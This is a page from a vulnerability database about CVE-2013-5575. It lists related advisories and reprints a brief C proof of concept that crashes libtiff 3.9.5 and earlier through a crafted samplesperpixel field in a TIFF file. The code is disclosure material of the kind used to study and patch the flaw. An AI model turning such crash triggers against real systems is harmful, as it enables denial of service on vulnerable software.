| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| libtiff <= 3.9.5 - Integer Overflow Vulnerability | 27 Aug 201300:00 | – | zdt | |
| CVE-2013-5575 | 18 Feb 202619:26 | – | attackerkb | |
| CVE-2013-5575 | 26 Sep 201310:00 | – | cve | |
| CVE-2013-5575 | 26 Sep 201310:00 | – | cvelist | |
| libtiff 3.9.5 - Integer Overflow | 26 Aug 201300:00 | – | exploitpack | |
| CVE-2013-5575 | 26 Sep 201314:16 | – | nvd | |
| Design/Logic Flaw | 26 Sep 201314:16 | – | prion | |
| libtiff <= 3.9.5 - Integer Overflow | 1 Jul 201400:00 | – | seebug | |
| CVE-2013-5575 | 26 Sep 201314:16 | – | ubuntucve |
/*
# Exploit Title: libtiff <= 3.9.5 Integer overflow bug poc
# Date: 2013/08/25
# Exploit Author: x90c
# Vendor Homepage: http://www.remotesensing.org/libtiff
# Version:
- libtiff 3.9.5 <=
# Tested on:
- libtiff 4.0.3
- libtiff 4.0.2
- libtiff 4.0.1
- libtiff 4.0.0 (safe)
- libtiff 3.9.5 (vulnerable) <=
- libtiff 3.6.0
# CVE : CVE-2013-5575
I submit the poc of libtiff bug and
attached original advisory too
I want to submit the poc, sample file only
http://www.x90c.org/advisories/xadv_2013001_libtiff.txt
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "tiffio.h"
int tiff_integer_overflow_test(){
TIFF* tif = TIFFOpen("/home/x90c/sample_spp.tif", "r");
int samples = 0;
/*
* for instance, TIFFGetField library function will
* called with malicious samplesperpixel field value
* TIFFGetField got segfault!
*/
TIFFGetField(tif, TIFFTAG_SAMPLESPERPIXEL, &samples);
printf("tiff_poc: tif samplesperpixel field=%d\n", samples);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation